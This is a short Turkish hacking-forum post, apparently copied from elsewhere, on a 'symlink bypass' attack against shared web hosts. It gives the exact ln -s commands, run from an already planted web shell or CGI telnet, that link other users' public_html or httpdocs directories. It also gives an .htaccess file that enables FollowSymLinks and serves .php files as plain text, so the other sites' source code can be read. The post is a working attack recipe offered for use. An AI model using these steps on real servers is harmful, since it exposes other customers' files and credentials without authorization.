Server Kök Dizin Bypass (1 Viewer)

Joined
May 18, 2017
Credits
0
Rating - 0%

Shellerdeki sym bir klasor oluşturur ve oraya çekmeye çalışır dosyayı sunucuda yazma izni olmadığı için işlem yapamazsınız ama bu sistemin çok basit bir yöntemi var

ilk olarak run command ( komut yedirebildiğimi shell veya cgi telnet te olabilir )

Run command sistemini açıyoruz

1.Kod Linux Public_html ;

Kod:
"ln -s /home/çekmekistediğimizdizin/public_html/ asd.txt"
2.Kod Linux Httpdocs ;


Kod:
"ln -s /home/çekmekistediğinizdizin/httpdocs/ asd.txt"
Şeklinde yazıyoruz ve enterlıyoruz


Çektiğimiz dizin asd.txt olarak gelicektir. açmaya çalıştığınızda 403 forbidden hatası ile karşılaşıcaksınız.

Şimdi ise asd.txt nin olduğu yere .htaccess dosyası atıyoruz

.htaccess kodları ;

Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
bu kadar f5 çekmeniz yeterli dizinler karşımıza gelicektir.


Not ;bu htaccessi ana dizine asla atmayın shellinizin olduğu dizinede atmayın yoksa site down

ALINTIDIR...
 

Users who are viewing this thread

Top